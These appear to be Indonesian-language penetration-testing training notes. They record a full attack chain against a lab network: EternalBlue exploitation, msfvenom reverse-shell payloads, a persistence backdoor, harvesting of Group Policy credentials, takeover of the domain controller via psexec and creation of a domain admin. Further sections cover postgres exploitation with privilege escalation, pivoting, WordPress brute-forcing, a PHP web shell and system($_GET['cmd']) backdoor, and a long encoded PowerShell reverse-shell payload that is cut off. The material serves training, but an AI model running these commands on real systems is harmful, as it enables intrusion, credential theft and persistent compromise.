Skip to main content

Bahan Training Security

 Metasploit windows


# msfdb start

# msfconsole


> use auxiliary/scanner/portscan/tcp

> set RHOST 192.168.56.105 192.168.56.100

> run


+] 192.168.56.105:       - 192.168.56.105:25 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:21 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:80 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:81 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:110 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:139 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:135 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:445 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:443 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:587 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:995 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:3306 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:3389 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:4433 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:5357 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:5985 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:7777 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:8009 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:8080 - TCP OPEN

[*] Scanned 1 of 2 hosts (50% complete)

[+] 192.168.56.100:       - 192.168.56.100:53 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:88 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:139 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:135 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:389 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:445 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:464 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:593 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:636 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:3269 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:3268 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:3389 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:5722 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:9389 - TCP OPEN

[*] Scanned 2 of 2 hosts (100% complete)

[*] Auxiliary module execution completed



> use auxiliary/scanner/smb/smb_version

> set RHOST 192.168.56.105 192.168.56.100

> run


[+] 192.168.56.105:445    - Host is running Windows 7 Enterprise SP1 (build:7601) (name:KEUANGAN-PC) (domain:MEGACORP) (signatures:optional)

[*] Scanned 1 of 2 hosts (50% complete)

[+] 192.168.56.100:445    - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:DC-SVR) (domain:MEGACORP) (signatures:required)

[*] Scanned 2 of 2 hosts (100% complete)

[*] Auxiliary module execution completed


> services -p 445

Services

========


host            port  proto  name  state  info

----            ----  -----  ----  -----  ----

192.168.56.100  445   tcp    smb   open   Windows 2008 R2 Datacenter SP1 (build:7601) (name:DC-SVR) (domain:MEGACORP) (signatures:required)

192.168.56.105  445   tcp    smb   open   Windows 7 Enterprise SP1 (build:7601) (name:KEUANGAN-PC) (domain:MEGACORP) (signatures:optional)


> use auxiliary/scanner/smb/smb_ms17_010 

> set RHOSTS 192.168.56.105 192.168.56.100

> run


[+] 192.168.56.105:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 1 of 2 hosts (50% complete)

[+] 192.168.56.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 2 of 2 hosts (100% complete)

[*] Auxiliary module execution completed


> use exploit/windows/smb/ms17_010_eternalblue

> set RHOST 192.168.56.105

> set payload windows/x64/meterpreter/reverse_https

> set LHOST 192.168.56.4

> exploit


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=8080 -f exe -o winbox.exe 


> use exploit/multi/handler

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.56.4

> set LPORT 8080

> run


$ python -m SimpleHTTPServer 8069


### Download & jalankan file winbox.exe di client


> sessions


Active sessions

===============


  Id  Name  Type                     Information                    Connection

  --  ----  ----                     -----------                    ----------

  2         meterpreter x86/windows  MEGACORP\rhooke @ KEUANGAN-PC  192.168.56.4:8080 -> 192.168.56.105:49424 (192.168.56.105)



> sessions 2

meterpreter > getpid

Current pid: 5036

meterpreter > sysinfo

Computer        : KEUANGAN-PC

OS              : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : id_ID

Domain          : MEGACORP

Logged On Users : 3

Meterpreter     : x86/windows


# locate PowerView.ps1

/usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1

/usr/share/windows-resources/powersploit/Recon/PowerView.ps1


meterpreter > load powershell


meterpreter > powershell_import /usr/share/windows-resources/powersploit/Recon/PowerView.ps1


### Create Persistence Backdoor


meterpreter > run persistence -X -U -r 192.168.56.4 -p 4444

meterpreter > background 

> set LPORT 4444

> exploit -j

> jobs -K

> exploit


> show sessions


Active sessions

===============


  Id  Name  Type                     Information                    Connection

  --  ----  ----                     -----------                    ----------

  4         meterpreter x86/windows  MEGACORP\rhooke @ KEUANGAN-PC  192.168.56.4:4444 -> 192.168.56.105:49185 (192.168.56.105)


  

### Privilege Escalation WIndows server 2008 Grour Policy Password


meterpreter > run post/windows/gather/credentials/gpp


[+] [2020.08.04-00:46:24]  Group Policy Credential Info

============================


 Name               Value

 ----               -----

 TYPE               Groups.xml

 USERNAME           svc_adm

 PASSWORD           j4K4R741572!

 DOMAIN CONTROLLER  DC-SVR

 DOMAIN             megacorp.local

 CHANGED            2020-07-19 12:06:11

 NEVER_EXPIRES?     1

 DISABLED           0

 NAME               Default Domain Policy


 meterpreter > shell

 

 C:\Windows\system32>net user svc_adm  

net user svc_adm

User name                    svc_adm

Full Name                    

Comment                      

User's comment               

Country code                 000 (System Default)

Account active               Yes

Account expires              Never


Password last set            04/08/2020 11:39:32

Password expires             Never

Password changeable          05/08/2020 11:39:32

Password required            Yes

User may change password     Yes


Workstations allowed         All

Logon script                 

User profile                 

Home directory               

Last logon                   Never


Logon hours allowed          All


Local Group Memberships      

Global Group memberships     *None                 

The command completed successfully.


### Attack domain controller


meterpreter > background


> use exploit/windows/smb/psexec

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.56.4

> set LPORT 4444

> set RHOST 192.168.56.100

> set SMBUSER svc_adm

> set SMBPASS j4K4R741572!

> exploit



[*] [2020.08.04-00:53:38] Started reverse TCP handler on 192.168.56.4:4444 

[*] [2020.08.04-00:53:38] 192.168.56.100:445 - Connecting to the server...

[*] [2020.08.04-00:53:38] 192.168.56.100:445 - Authenticating to 192.168.56.100:445 as user 'svc_adm'...

[*] [2020.08.04-00:53:39] 192.168.56.100:445 - Selecting PowerShell target

[*] [2020.08.04-00:53:39] 192.168.56.100:445 - Executing the payload...

[+] [2020.08.04-00:53:43] 192.168.56.100:445 - Service start timed out, OK if running a command or non-service executable...

[*] [2020.08.04-00:53:55] Encoded stage with x86/shikata_ga_nai

[*] [2020.08.04-00:53:55] Sending encoded stage (176224 bytes) to 192.168.56.100

[*] Meterpreter session 5 opened (192.168.56.4:4444 -> 192.168.56.100:49347) at 2020-08-04 00:53:56 -0400


meterpreter > sysinfo

Computer        : DC-SVR

OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : id_ID

Domain          : MEGACORP

Logged On Users : 1

Meterpreter     : x86/windows


meterpreter > shell

C:\Windows\system32>net user aceng Anjay123! /add /domain

C:\Windows\system32>net localgroup Administrators aceng /add /domain

# rdesktop -d megacorp -u aceng -p Anjay123! 192.168.56.100

 


 ### Vulnerability Assesment

 

 Ada di folder catatan/vunerability-assesment

 

 Vulnerability Assesment adalah ketika kita menemukan vunerability kita melakukan testing atau poc terhadap temuan vunerability tersebut.

 kemudian didokumentasikan impact yang akan terjadi terhadap vulnerability yg ditemukan.

 

 

 ### Pentest hasil temuan VA dengan metasploit

 

msf5 > workspace -a nessus_pentest

[*] Added workspace: nessus_pentest                                                                                                                                   

[*] Workspace: nessus_pentest 


msf5 > db_import /home/kali/Downloads/Training_Nessus_ylvmgg.nessus

[*] Importing 'Nessus XML (v2)' data

[*] Importing host 192.168.56.120

[*] Importing host 192.168.56.105

[*] Importing host 192.168.56.100

[*] Importing host 192.168.56.2

[*] Importing host 10.14.3.234

[*] Successfully imported /home/kali/Downloads/Training_Nessus_ylvmgg.nessus


msf5 > vulns


install metasploit plugins


git clone https://github.com/darkoperator/Metasploit-Plugins.git


msf5 > load pentest

msf5 > setg LHOST 192.168.56.4


msf5 > vuln_exploit 

msf5 > vuln_exploit 

[*] Generating List for Matching...

[*] Matching Exploits (This will take a while depending on number of hosts)...

[-] No Exploits where Matched.



git clone https://github.com/DanMcInerney/msf-autopwn.git --recursive

cd msf-autopwn/                                                                                      

sudo apt install pipenv 


### Credential Patch Audit - Scan dengan credential



### Pentest postgresql


msf5 > use auxiliary/scanner/postgres/postgres_login 

msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.120

msf5 auxiliary(scanner/postgres/postgres_login) > run

[+] 192.168.56.120:5432 - Login Successful: postgres:postgres@template1


msf5 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_readfile 

msf5 auxiliary(admin/postgres/postgres_readfile) > set RHOST 192.168.56.120

msf5 auxiliary(admin/postgres/postgres_readfile) > use auxiliary/scanner/postgres/postgres_hashdump 

msf5 auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 192.168.56.120

msf5 auxiliary(scanner/postgres/postgres_hashdump) > run



msf5 auxiliary(scanner/postgres/postgres_hashdump) > use auxiliary/admin/postgres/postgres_sql

msf5 auxiliary(admin/postgres/postgres_sql) > set RHOSTS 192.168.56.120

sf5 auxiliary(admin/postgres/postgres_sql) > show options 


Module options (auxiliary/admin/postgres/postgres_sql):


   Name           Current Setting   Required  Description

   ----           ---------------   --------  -----------

   DATABASE       template1         yes       The database to authenticate against

   PASSWORD       postgres          no        The password for the specified username. Leave blank for a random password.

   RETURN_ROWSET  true              no        Set to true to see query result sets

   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT          5432              yes       The target port

   SQL            select version()  no        The SQL query to execute

   USERNAME       postgres          yes       The username to authenticate as

   VERBOSE        false             no        Enable verbose output


   

 RHOSTS => 192.168.56.120

msf5 auxiliary(admin/postgres/postgres_sql) > run

[*] Running module against 192.168.56.120


Query Text: 'select version()'

==============================


    version

    -------

    PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)


[*] Auxiliary module execution completed



msf5 auxiliary(admin/postgres/postgres_sql) > use exploit/linux/postgres/postgres_payload 

msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp

msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.120

msf5 exploit(linux/postgres/postgres_payload) > set LPORT 8080

msf5 exploit(linux/postgres/postgres_payload) > exploit 


[*] Started reverse TCP handler on 192.168.56.4:8080 

[*] 192.168.56.120:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

[*] Uploaded as /tmp/oVSLcTrl.so, should be cleaned up automatically

[*] Sending stage (980808 bytes) to 192.168.56.120

[*] Meterpreter session 1 opened (192.168.56.4:8080 -> 192.168.56.120:51579) at 2020-08-05 02:35:45 -0400


meterpreter > 


meterpreter > sysinfo

Computer     : metasploitable.localdomain

OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)

Architecture : i686

BuildTuple   : i486-linux-musl

Meterpreter  : x86/linux


meterpreter > shell

Process 6348 created.

Channel 2 created.


uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux


[ctrl + c]

meterpreter > background 


msf5 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink 

msf5 exploit(linux/local/udev_netlink) > sessions


Active sessions

===============


  Id  Name  Type                   Information                                                                       Connection

  --  ----  ----                   -----------                                                                       ----------

  1         meterpreter x86/linux  no-user @ metasploitable (uid=108, gid=117, euid=108, egid=117) @ metasploita...  192.168.56.4:8080 -> 192.168.56.120:49379 (192.168.56.120)

msf5 exploit(linux/local/udev_netlink) > set payload linux/x86/meterpreter/reverse_tcp

msf5 exploit(linux/local/udev_netlink) > set session 1

msf5 exploit(linux/local/udev_netlink) > set LHOST 192.168.56.4

msf5 exploit(linux/local/udev_netlink) > set LHOST 192.168.56.4

LHOST => 192.168.56.4

msf5 exploit(linux/local/udev_netlink) > set LPORT 8080

LPORT => 8080

msf5 exploit(linux/local/udev_netlink) > exploit 


[*] Started reverse TCP handler on 192.168.56.4:8080 

[*] Attempting to autodetect netlink pid...

[*] Meterpreter session, using get_processes to find netlink pid

[*] udev pid: 2361

[+] Found netlink pid: 2360

[*] Writing payload executable (207 bytes) to /tmp/okdriNosTv

[*] Writing exploit executable (1879 bytes) to /tmp/rrmpTfgUdR

[*] chmod'ing and running it...

[*] Sending stage (980808 bytes) to 192.168.56.120

[*] Meterpreter session 2 opened (192.168.56.4:8080 -> 192.168.56.120:53184) at 2020-08-05 02:50:22 -0400


meterpreter > 

meterpreter > shell

Process 6391 created.

Channel 1 created.

whoami

firefart

/bin/bash -i

bash: no job control in this shell

firefart@metasploitable:/# 



### Hack with Tunneling


Hack metasploitable2 vm via windows


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=8080 -f exe -o notepad.exe  


msf5 exploit(linux/local/udev_netlink) > use exploit/multi/handler 

msf5 exploit(multi/handler) > set windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.56.4

LHOST => 192.168.56.4

msf5 exploit(multi/handler) > set LPORT 8080

LPORT => 8080

msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on  192.168.56.4:8080



meterpreter > portfwd add -l 8085 -p 80 -r 192.168.56.4

meterpreter > portfwd list


Active Port Forwards

====================


   Index  Local         Remote           Direction

   -----  -----         ------           ---------

   1      0.0.0.0:8085  192.168.56.4:80  Forward


1 total active port forwards.


meterpreter > portfwd add -l 8086 -p 22 -r 192.168.56.120

[*] Local TCP relay created: :8086 <-> 192.168.56.120:22


$ ssh -p 8086 msfadmin@127.0.0.1


## dengan dynamic port forwarding


msf5 exploit(multi/handler) > use auxiliary/server/socks4a 

msf5 auxiliary(server/socks4a) > set SRVPORT 9050

SRVPORT => 9050

msf5 auxiliary(server/socks4a) > route add 192.168.56.0/24 3

[*] Route already exists

msf5 auxiliary(server/socks4a) > route 


IPv4 Active Routing Table

=========================


   Subnet             Netmask            Gateway

   ------             -------            -------

   192.168.56.0       255.255.255.0      Session 3


[*] There are currently no IPv6 routes defined.

msf5 auxiliary(server/socks4a) > 


msf5 auxiliary(server/socks4a) > run


$ proxychains curl 192.168.56.120                                                                                                                                   

ProxyChains-3.1 (http://proxychains.sf.net)                                                                                                                           

|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.120:80-                                                                                                                   

<><>-OK                                                                                                                                                               

<html><head><title>Metasploitable2 - Linux</title></head><body>                                                                                                       

<pre>                                                                                                                                                                 

                                                                                                                                                                      

                _                  _       _ _        _     _      ____                                                                                               

 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \                                                                                              

| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |                                                                                             

| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/                                                                                              

|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                                                                                             

                            |_|                                                                                                                                       

                                                                                                                                                                      

                                                                                                                                                                      

Warning: Never expose this VM to an untrusted network!                                                                                                                

                                                                                                                                                                      

Contact: msfdev[at]metasploit.com                                                                                                                                     

                                                                                                                                                                      

Login with msfadmin/msfadmin to get started                                                                                                                           

                                                                                                                                                                      

                                                                                                                                                                      

</pre>                                                                                                                                                                

<ul>                                                                                                                                                                  

<li><a href="/twiki/">TWiki</a></li>                                                                                                                                  

<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>                                                                                                                        

<li><a href="/mutillidae/">Mutillidae</a></li>                                                                                                                        

<li><a href="/dvwa/">DVWA</a></li>                                                                                                                                    

<li><a href="/dav/">WebDAV</a></li>                                                                                                                                   

</ul>                                                                                                                                                                 

</body>                                                                                                                                                               

</html>          


### Web Application Attacks


#### Pentest Wordpress

$ dirb http://192.168.56.105/

$ whatweb http://192.168.56.105/wordpress/ 

/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete

http://192.168.56.105/wordpress/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.3], IP[192.168.56.105], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], OpenSSL[1.1.1c], PHP[7.4.3][C:\xampp\htdocs\wordpress\wp-includes\pomo\plural-forms.php], Script[text/javascript], Title[MegaCorp Website], UncommonHeaders[link], WordPress[4.9.8], X-Powered-By[PHP/7.4.3]


$ wpscan --url http://192.168.56.105/wordpress -e vp

$ wpscan --url http://192.168.56.105/wordpress -e u1-5

$ wpscan --url http://192.168.56.105/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt

[!] Valid Combinations Found:

 | Username: admin, Password: monkey123


$ git clone https://github.com/b374k/b374k.git

$ cd b374k 

$ php index.php -p Anjay123! -o shell.php -s -b -z gzcompress -c 9                                                                      

b374k shell packer 0.4.2                                                                                                                  

                                                                                                                                          

Filename                : shell.php                                                                                                       

Password                : Anjay123!                                                                                                       

Theme                   : default                                                                                                         

Modules                 : convert,database,info,mail,network,processes                                                                    

Strip                   : yes                                                                                                             

Base64                  : yes                                                                                                             

Compression             : gzcompress                                                                                                      

Compression level       : 9                                                                                                               

Result                  : Succeeded : [ shell.php ] Filesize : 111695


$ gedit shell.php ---> copy semua isi file


masuk ke admin wordpress -> tampilan -> editor -> ganti template 404 -> paste dari isi file shell.php


buka http://192.168.56.105/wordpress/ngasal

masukin password Anjay123!


dengan simple Backdoor :


masuk ke admin wordpress -> tampilan -> editor -> ganti template 404 -> paste dari isi file shell


```

<?php

echo "<pre>";

system($_GET['cmd']);

echo "</pre>";

?>

```

buka webnya : 

http://192.168.56.105/wordpress/aa?cmd=whoami


msf5 > handler -H 192.168.56.4 -P 6988 -p windows/meterpreter/reverse_tcp


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=6988 -f psh-cmd

usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil                                                         

/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil                                                         

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload                                                    

[-] No arch selected, selecting arch: x86 from the payload                                                                                

No encoder or badchars specified, outputting raw payload                                                                                  

Payload size: 341 bytes                                                                                                                   

Final size of psh-cmd file: 6319 bytes                                                                                                    

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDADUANQBLADEAOABDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA0AHgAcwBSAHUAawAwAGEAcQBkAEkAdgBmAHIAbgBIAHMARQBMAC8AaQBXAHEAYwBOAEwATABEAE8AdwB0AHEAdwArAE4AWAByAC8AMwA2AEQAYgBkAEwAMABtAHYAYgBhAGsAdwA3ADUAcwBZACsAWgAyAFoAbAB2AHYAcABuAEYAVABVAEoAYgBVAEIANQBLADQAcgBvAGoAZgBUADQANwBQAGUAbgBoAEMAQQBlAFMAawBuAFAAKwA3AE8AYQBsAEgASwBtAHAASgB5AGUAdwBtAGcAdQBHADAAZwBkAEoAbQBhAEwARgBvAHMAbwBEAFQATQBQAFoAegBVADAAbABpAFMASQBTAGkAcwBPADgAMABDAEEAQwB4AFQARQBKAEgAaABrAGwAcwBhAEoASwBmADAAawBqAG4AMABUAGsANAB2AFoAeABUAG0AdwBoAGYAWgBaAHkAZgB4AFkAYQBqAEQAOQBpAGQAaABUAGIAVgByAEQAdABFACsAawBDAGgAVQA2ADYAMQArAEUAMgBUAGgAMABwAFcAQQB0AEcAaABTAEoALwArAGkAUwByADAAdwB0ADkAVgBxAGcAdABFADgAeABpAFIAYgBhADIAcwBTAEIAQgB3AFcARgBNAFYAcQBVAHYAYQBuAHIAZwAvAFgAWgBCAEYATgBtAGsAZABzAFIAagA3AG8AcgBDAGkASQBhAGwAeQA4AEkAZwBqAEwARgBMAHUAbQBCAHQAUgBVAHcAaQBmAE8ANwBFAHMAZwBvAHgAdwBDAGMAaQBJAG8AbABDAEMAYQBKAEoAMQBRACsAYgBpAGcAegBEAFgAcwBSAHQANQBEAGcAUgBpAFcATQA1AEwAMAAxAFQAdwA5AFAAWgA3AEEAOQBsAGUAagB6ADEATABnAGsARgBEAFUAaQBoAEYAUQBvAFMAOABZAFYARgBvAGgAVwAxAFMAVgB4AG8ANAB0AEIAaAA1AEkANgA0AE0AOQBDAHkAUgBFAFIARABiADYAYQBxAEkATABiAGkAVAAwAFQASgBoAFEAbABqAGUAZQBsADMAegBDAGgAZABzAHMANAB3ACsAMQBVAGwANQBhAFUAUwBTAFAAVgBFAHAATwBZAGgAaABkADkARgBhAFgASQBuAFkAZQBTAGcASgA3AC8AaQBaAHAAcAAwAEYAWgA1AEQANABnAEcAegBMADIAZQBuAFoANgBkAHUAUgBoAEYAdQBYAHYAdgA2AFMANQBMAEEANgBHAFMANgBIAHgATgB3AFQAZQBuAHgAbQBPADQARgBQADAAagBGAHYARwBUAEMATQBWAGoAdwBhAEEAdgBUADMASAAyAFUARQBIAFgAMgBEAEsAeQBVAFkAMgAvAG4AZQB2ADcASAArAG4AbwBtAEQASwBKAHoASABSAGEAbQBRADAANgBkAEcAUwBnAGMATQA1AG4AYgBrAG4AZQBwADQARQA4AFkAVwBTAFUAdQBEAFUAbAAxAEcAKwBLAEEAMgBoAG4AcABsAE4AYwBBAEoAaQA0AGoAKwB4AEEATABtAFYAZwBYAFgARgBMAGsANAB3AFoAeABxAG8AUQBSAEQANABzAFUAdABEAFQAUAAzADYAbgBWAEEAaQBxAGUAZABZADIARQBNAG8AZABFAHkASQBZAGsAeABlAEEAVgA1AEUALwA5ADEAcABsAEQASABoAFMANQBGAFoAbwBrAEEASQBRAE8AYwB5AEIAZQB6AGcAVwBxAGsAMAB6ADYAUwBPADkAdABkAG4AbwA2AEIAeQBHADUAdwBuAEEAYwA1ADYAVgBlAEEAcgBWAG0ANQB5AFcATABZAEUAYQBjAHYASQBUAEMAbQBCADYAMwBVAEMATAA0AGYAaQBoAC8AZABkAGQATQBtAEsAQQAyAGoAawBWAG0AYgBxAFoAbQBPAEIANwBQAHEALwBBAHcARgBsAEYAaQBRADkASQBnADkAbgB0AHIAUQBXAHkASwBXAFEAcABGAFgAbQBwAFMAaAB4AGgAYgBpADMAcgBaAHUAZgBLAHIAUQBGAFEAdwBZADEAQQBEAFkARwBrAEYAaQBZAEMAVgBGAEEAQgBMAHAARgBTAEkAdwBNAFYAOQAyAHQAVwBDAFIAVQBRAHIAVwBEAEEAUwBnAE0AeQArADYATwBzAE0AZQAxAEQAaQBSADYAYgB2AHUAWQBNADkANABzAGoALwA5AEQARABqADgAbwBHADQASwBSAFkAWgBDAEMALwA4AGcAdwBSAGIAagBJAHUAOABOAEsAUwBSAGcATgA2AFIANABnAHAAawArADAAKwBIAHYAKwBnAFoAZQB6AGMAcQBFAFQAawBtAFEAcwBuAEsAWQAyAHAAcwBSAGMAcgBwADMATwBPAGsAVwA2AHEAbgBsAEQAegBDAHMAZwBjAGgARQBnAEIAQQBQAGUASwBCAGcAVwBQAHkAcgBuAHgAbwBFAGMAbwBiADcAWgBaAFcARQBEAHkAVABWAHMAaABNADIAMwBpAGkATwBsAHAAVAB2AFcAWABDAGQAMABCAEwATABWADYAOQBjAGoANgAyADUAMAAwAHQAcQBtADUAOABGADcAWABpAGwAdABuAHMAVgBmAHYATgBaAG4AbgBWAHQAbwBaAGwAWQBkAFYAYQA0AG0ATwB2AEoAYwB6AGEAZQBEADYAMwBVAFAATgB1AE0AQgBFAFAATABkAFMAOABwADgAVwBuAFMAWABtADMAYQBOAE8AZAAxAFUASABPAFoASwBPADkAMgB4AG0ANwBkAGQASABZADcATwBhAGUANAAwADYAcQByAHUAdABkAHUAZABhAGQALwByAFoATwBPADYATgBLADMAeQBoAGUANABrADYAMQBsAG4AUgBHAHgAdABvAG8AbAB1AE0AYQBYAFQAZgA3AGQATgBCAC8AYQB0AGYARgA0ADIAVABJADgATQBEAFYAdgBMAEgAKwBIAHQATgBOAEoANQBvAFAAZABXADcAdQBXAGcAZwAxAC8ASgBLADkAYQA3AHYARABoAG0AOAA2ADIAMABtAFQAawByAGwAVwA3AE4AQQArADYAaQBQADAAMABiADQAYgBEAEIAcgBlAHcAbQB2AEUAUwBIAHMALwBYAEYAYQBDAE8AVgBwAFcAdgBSAHAARwBMAGQAUQBvAGIAdAB0AHYAbQBkAEUAZgAxAEEAMAAwAHEAQgBsADkAZgBNAHQANwBwAGYATwBxAHAAagA4ADQAeQAxAHIAOQBZAFkAegBiAEEAWABNAGEAVABVADIAZgBqAEoARwBEAEkAdQAzAGUAOAAvAFcAcgBXAHoAOQBNAGMAYwBLAGUAcwBUAFIAUwBHAGQAUgA1ADIATgBZADEAawBPAG0AVgBVAGIATgA4AFMAWABjAFAAeQAzADcARABRAHoAVwBRAEcAUQBZAGMANABUAHAAOQBHAHAAeQBQAHcAVwBiADMASABuAFIARwBBADkAMwBoAFMASQBTAHQAcwBhAFkATgBQAGMAMQBEAHIAdQBWAFAATQBEAEoAQQAyAGwAaQBpAHUAcwBFAHIAMgArAHUAZQAyAGQATwBHAHcAMAB0AGYAZgAzAHoAUwBmAGYAQwBaAGoARgBmAFgAWgBoAHUAZAAxACsAMgBlAHAAbQBuAG4AdwBTAFAAOABhAHMAZwAyAEYANQB0AHcAYgBLAHkAdgBWAG0AdQBCADIAeQBPAHcAZgBhACsAOQBIADMAeAA0AGsANQBJAEUAVwBKAEkATABpAHYATQBYAHEAZgA5AFIAeQB6AFoAeABGAFAAdQBZAEEAUwBXAGcARwAyAGQAMQBXAE8AZABSAC8AZABoAGkAZQA1AHkAbQBHAG8AcQBTADMAcwBaAFAASgBBAG8ASgBnAHcAcwBOAHIAcgB5AE0AeQA0AGcAeABiAHEAZgBOAC8AZABDAEwANABXAFkANQA5AFAAdgAwACsAaABuAEEAcwBIAFQANQA2AGsAaQBWAG4AZwBYAFYAcgAzADAALwBXADcAcQA1AGUAUQBBAHYAbwBVAEQAMgBEAEMANQAwAFMATwBnAEoAUAAxAC8AYwBsAEkAcABGADYATwB